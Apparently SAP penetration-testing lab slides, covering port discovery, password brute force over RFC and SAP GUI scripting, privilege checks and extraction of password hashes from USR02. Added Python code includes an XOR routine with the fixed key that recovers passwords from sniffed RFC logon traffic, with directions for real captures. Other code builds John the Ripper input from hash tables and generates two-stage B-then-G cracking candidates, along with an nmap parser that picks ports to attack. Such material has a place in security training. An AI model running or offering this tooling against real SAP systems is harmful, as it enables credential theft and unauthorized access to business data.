LABS
• Service discovery
• Get information
• Remote password brute force
• Authentication data capture (RFC/DIAG)
• Authorization bypass
• VBA + RFC
• Privilege analysis
• Access to user password hashes
• "Offline" password brute force
• Get data from another mandant (client)
• Access to OS files
• Run OS commands

Tools: Nmap, RFCSDK/NWRFCSDK, VBS/Python, SAP Frontend 7.20

Scenario
• Scan ports
• Get service information
• Mandant (client) discovery
• Account brute force (RFC)
• Account brute force (GUI)
Port scanning
Search for SAP systems: http://scn.sap.com/docs/DOC-17124
SAP (NN = two-digit instance number)
• SAP DIAG – 32NN TCP (3200-3299)
• SAP RFC – 33NN TCP (3300-3399)
• ICM HTTP – 80NN TCP
• Message Server HTTP – 81NN TCP
• HTTP – 5NNxx TCP
OS
• SSH/Telnet/Rlogin – 22/23/512-514
DBMS
• Oracle – 1521-1530
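The following is an added example, not part of the original slides: it builds the nmap port specification from the ranges listed above and then parses nmap's grepable output (`-oG`) to tag every open port with its SAP role and instance number. The instance derivation (low-order two digits for 32NN/33NN/80NN/81NN, the second and third digit for 5NNxx) and the `-oG` line layout are assumptions made here; the scan output in the block is constructed, not a real scan.

```python
import re

# Port ranges from the slide. For 32NN/33NN/80NN/81NN the two low-order digits are
# the SAP instance number NN; for 5NNxx the instance is the 2nd+3rd digit (assumption).
SAP_RANGES = [
    ("DIAG (SAP GUI)", 3200, 3299),
    ("RFC gateway", 3300, 3399),
    ("ICM HTTP", 8000, 8099),
    ("Message Server HTTP", 8100, 8199),
]
OS_RANGES = [("SSH", 22, 22), ("Telnet", 23, 23), ("rexec/rlogin/rsh", 512, 514)]
DB_RANGES = [("Oracle listener", 1521, 1530)]
HTTP_5NN = ("HTTP (5NNxx)", 50000, 59999)


def nmap_port_spec():
    """Build the -p argument covering every range on the slide."""
    parts = []
    for _name, lo, hi in OS_RANGES + DB_RANGES + SAP_RANGES + [HTTP_5NN]:
        parts.append(str(lo) if lo == hi else f"{lo}-{hi}")
    return ",".join(parts)


def classify_port(port):
    """(service, instance) for an SAP port, (service, None) for OS/DB ports, else None."""
    for name, lo, hi in SAP_RANGES:
        if lo <= port <= hi:
            return name, f"{port - lo:02d}"
    name, lo, hi = HTTP_5NN
    if lo <= port <= hi:
        return name, f"{(port - lo) // 100:02d}"
    for name, lo, hi in OS_RANGES + DB_RANGES:
        if lo <= port <= hi:
            return name, None
    return None


# nmap -oG: "Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>/<owner>/<svc>/<rpc>/<ver>/, ..."
HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\((.*?)\)\s+Ports:\s+(.*)$")
OPEN_PORT = re.compile(r"(\d+)/open/tcp")


def parse_grepable(text):
    """Parse `nmap -oG` output; return (host, port, service, instance) for known ports."""
    findings = []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if not m:
            continue  # comment lines and hosts without a Ports: field
        host, _hostname, ports = m.groups()
        for port in map(int, OPEN_PORT.findall(ports)):
            info = classify_port(port)
            if info:
                findings.append((host, port) + info)
    return findings


# Constructed sample of `nmap -oG` output for the demonstration (not a real scan).
SAMPLE_SCAN = """\
# Nmap scan initiated as: nmap -sS -p 22,3200-3399,8000-8199,50000-59999 -oG - 10.0.0.5
Host: 10.0.0.5 (sap01.lab)\tPorts: 22/open/tcp//ssh///, 3202/open/tcp//sapdiag///, 3302/open/tcp//saprfc///, 8002/open/tcp//http///, 50213/open/tcp//http///\tIgnored State: closed (995)
# Nmap done
"""

if __name__ == "__main__":
    print("nmap -sS -p", nmap_port_spec(), "-oG scan.gnmap <targets>")
    for host, port, service, inst in parse_grepable(SAMPLE_SCAN):
        print(f"{host}:{port:<6} {service:<22} instance {inst}")
```

Every SAP port found on one host with the same instance number (here 02) belongs to the same application server instance, which is what you want to know before picking the RFC or DIAG port to attack.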
Automation. SAP RFCSDK. The SAP RFCSDK is a library for developing applications that communicate with an SAP system over the SAP RFC protocol. It includes a utility for testing RFC calls, Startrfc.exe, and makes it possible to integrate the system with PHP, Perl, VB, C++ and Python.

SAPGUI Scripting. Scripting is enabled by default in SAP Frontend, and knowledge of VBS is enough to brute force passwords. On the server side, SAP GUI automation requires the profile parameter sapgui/user_scripting to be enabled. You can use VBS or JScript.

SAPGUI Scripting. VBS. An example of how to brute force passwords via DIAG:
• Open the connection with OpenConnectionByConnectionString
• Enter the credentials into the appropriate fields via findById
• Check the script result (error/no error)
• Display the result

Usage of Python. Examples of how to get data from SAP structures and from SAP tables. You need the RFC SDK, a C/C++ compiler and the NWRFC bindings for Python. Check the results (error/no error) and display them in the console or write them to a file.
RFC data capture. Passwords are sent in obfuscated form: the obfuscation algorithm is XOR with a fixed key. The 40-byte key for password recovery (hex): 31 3e c3 60 e1 06 4e 3f 6b 48 c8 12 f5 fc 20 3c 89 61 2f f1 ef 2e af f3 bd ec 7e 25 b6 a0 71 83 a3 ea 7f ec 09 8a 40 21
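As an added example (not code from the original slides), the XOR recovery described above, using the 40 key bytes listed there. It is assumed here that each password byte is XORed with the key byte at the same position (the key is as long as the maximum password, so it is not cycled) and that the field on the wire uses a single-byte code page; the captured field in the block is constructed by obfuscating a sample password, not taken from a real capture. Because XOR is symmetric, the same routine also derives the key from a known password and its captured form, which is how to verify the key against your own traffic.

```python
RFC_XOR_KEY = bytes.fromhex(
    "313ec360e1064e3f6b48c812f5fc203c89612ff1"
    "ef2eaff3bdec7e25b6a07183a3ea7fec098a4021"
)  # the 40 key bytes from the slide; one key byte per password position


def xor_with_key(data, key=RFC_XOR_KEY):
    """XOR is symmetric: the same call obfuscates a password and recovers it."""
    if len(data) > len(key):
        # assumption: the key is not cycled, a field longer than 40 bytes is unexpected
        raise ValueError("field longer than the 40-byte key")
    return bytes(b ^ k for b, k in zip(data, key))


def obfuscate(password, codepage="cp1252"):
    """Produce the on-the-wire form of a password (assumption: single-byte code page)."""
    return xor_with_key(password.encode(codepage))


def recover_password(captured_field, codepage="cp1252"):
    """Turn the captured password field back into the cleartext password."""
    return xor_with_key(captured_field).decode(codepage)


def derive_key(known_password, captured_field):
    """Known-plaintext check: plaintext XOR ciphertext yields the key bytes in use."""
    return bytes(p ^ c for p, c in zip(known_password, captured_field))


# Constructed demonstration capture (not real traffic): the obfuscated form of "Init1234".
CAPTURED = obfuscate("Init1234")

if __name__ == "__main__":
    print("captured :", CAPTURED.hex())
    print("recovered:", recover_password(CAPTURED))
    # With a password you know (your own test account), confirm the key bytes match.
    print("key ok   :", derive_key(b"Init1234", CAPTURED) == RFC_XOR_KEY[:8])
```

To use it on a real capture, extract the password field bytes from the RFC logon data with your sniffer of choice and pass them to recover_password; a wrong offset shows up immediately as non-printable output, since XOR with the right key gives readable characters.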
Usage of VBA. Examples of how to get data from SAP structures and from SAP tables. You need SAP GUI or the .ocx components for import. Check the results (error/no error) and show them in Excel.

Tools: SAP Frontend, Perl, John the Ripper (Community Enhanced)

Privilege analysis. You have found an account: try to log in. If the login succeeds, analyze its privileges (first try transactions SA38/SE38/SE16/SE17/ST04). Check your rights and authorizations via report RSUSR002.

Collect password hashes
Tables with hashes: USR02, USH02, USRPWDHISTORY
How to get the data:
• SE16/SE16N/SE17
• ST04/SQL Command Editor
• RFC
• Database level…
• OS level/get the data from an OS file
Tools: SAPGUI, MIL Read Table, VBS, SQLplus ….
Vulnerabilities in hash algorithms
• CODVN A is an out-of-date algorithm developed by SAP: password length <= 8, all characters converted to UPPERCASE.
• CODVN B is an out-of-date MD5-based algorithm: only the first 8 characters of the password are used (the rest is discarded), all characters are converted to UPPERCASE, and special characters are replaced by ^.
• CODVN D is an out-of-date algorithm that tried to improve on B, in particular the truncation of the password and the handling of special characters.
• CODVN E was developed to replace B and D and eliminate their problems. Versions 4.6x to 6.x include it. See SAP Note 874738 - New password hash calculation procedure (code version E).
• CODVN F is now the most widely used algorithm. It is SHA1-based, the password length is up to 40 characters, and strings are converted to UTF-8 before hashing, so almost any character can be used. Versions from 7.00 include it.
• CODVN G = B + F: the system stores both the B hash and the F hash of the same password. First brute force the 8-character uppercase prefix via the B hash, then use that prefix to brute force the full password via the F hash. Versions from 7.00 include it.
• CODVN H is the most secure of these algorithms: SHA1-based with a variable-length salt. Versions from 7.02 include it.
• CODVN I = B + F + H: the same problems as G.
Brute force rate:
• up to 700 000 passwords per second for CODVN B
• up to 300 000 passwords per second for CODVN G
John the Ripper (Community Enhanced). John the Ripper 1.7.9-jumbo-5 can attack SAP password hashes of types B and F (and therefore both parts of a G hash). Password dictionaries: the Openwall wordlists collection (the full version is a paid download). Cracking can be parallelized across several CPUs.

Testing of passwords
• Download USR02 (fields BNAME/BCODE/PASSCODE)
• Create files in the format username:username<padded with spaces to 40 bytes>$HASHCODE
• Choose a dictionary or create your own
• Run John the Ripper
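The procedure above and the two-stage B-then-G attack from the hash-algorithm slides, as an added example (not code from the original slides). It turns USR02 rows into two John input files in the username:username<padded to 40 bytes>$HASH format described above (BCODE carries the B hash, 16 hex characters; PASSCODE carries the F/G hash, 40 hex characters), then expands a password recovered from the B hash into candidates for the F/G hash. Assumptions: the USR02 rows are constructed, not real data; the John format names sapB/sapG are those of jumbo builds (confirm with `john --list=formats`); and the first 8 characters of the original password contained only letters and digits, since B would have turned any special character into ^.

```python
import itertools

# Constructed USR02 rows (BNAME, BCODE, PASSCODE) for the demonstration; not real data.
USR02_ROWS = [
    ("SAPTEST", "1A2B3C4D5E6F7A8B", "0123456789ABCDEF0123456789ABCDEF01234567"),
    ("DDIC",    "0000000000000000", "0123456789ABCDEF0123456789ABCDEF01234567"),  # no B hash
    ("RFCUSER", "FEDCBA9876543210", ""),  # no F hash: B only
]

EMPTY_BCODE = "0" * 16  # BCODE value when no downward-compatible hash is stored


def john_line(bname, hashcode):
    """username:username<padded with spaces to 40 bytes>$HASH, as the slide describes."""
    return f"{bname}:{bname.ljust(40)}${hashcode}"


def build_john_files(rows):
    """Split USR02 rows into a sapB list (BCODE) and a sapG list (PASSCODE)."""
    sapb, sapg = [], []
    for bname, bcode, passcode in rows:
        if len(bcode) == 16 and bcode != EMPTY_BCODE:
            sapb.append(john_line(bname, bcode.upper()))
        if len(passcode) == 40:
            sapg.append(john_line(bname, passcode.upper()))
    return sapb, sapg


def g_stage_candidates(b_prefix, suffix_charset="0123456789", max_extra=2):
    """Expand a password cracked from the B hash (uppercased, cut to 8 characters) into
    candidates for the F/G hash: every case variant of the prefix, optionally followed by
    up to max_extra characters that B discarded. Assumption: letters/digits only."""
    cases = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in b_prefix]
    for variant in itertools.product(*cases):
        stem = "".join(variant)
        yield stem
        for n in range(1, max_extra + 1):
            for tail in itertools.product(suffix_charset, repeat=n):
                yield stem + "".join(tail)


def g_stage_size(b_prefix, suffix_charset="0123456789", max_extra=2):
    """Number of candidates g_stage_candidates() produces."""
    letters = sum(c.isalpha() for c in b_prefix)
    tails = sum(len(suffix_charset) ** n for n in range(0, max_extra + 1))
    return 2 ** letters * tails


if __name__ == "__main__":
    sapb, sapg = build_john_files(USR02_ROWS)
    with open("sapb.txt", "w") as f:
        f.write("\n".join(sapb) + "\n")
    with open("sapg.txt", "w") as f:
        f.write("\n".join(sapg) + "\n")
    print("john --format=sapB --wordlist=words.txt sapb.txt")
    # Suppose the B stage returned INIT1234 for a user that also has a G hash:
    with open("g_stage.txt", "w") as f:
        for cand in g_stage_candidates("INIT1234"):
            f.write(cand + "\n")
    print("john --format=sapG --wordlist=g_stage.txt sapg.txt")
    print("G-stage candidates for INIT1234:", g_stage_size("INIT1234"))
```

The point of the second stage is the size of the search: for INIT1234 with two extra digits allowed, the G stage tries 1776 candidates instead of a full keyspace of 10-character passwords, which is why a stored B hash next to an F hash undoes most of what F gained.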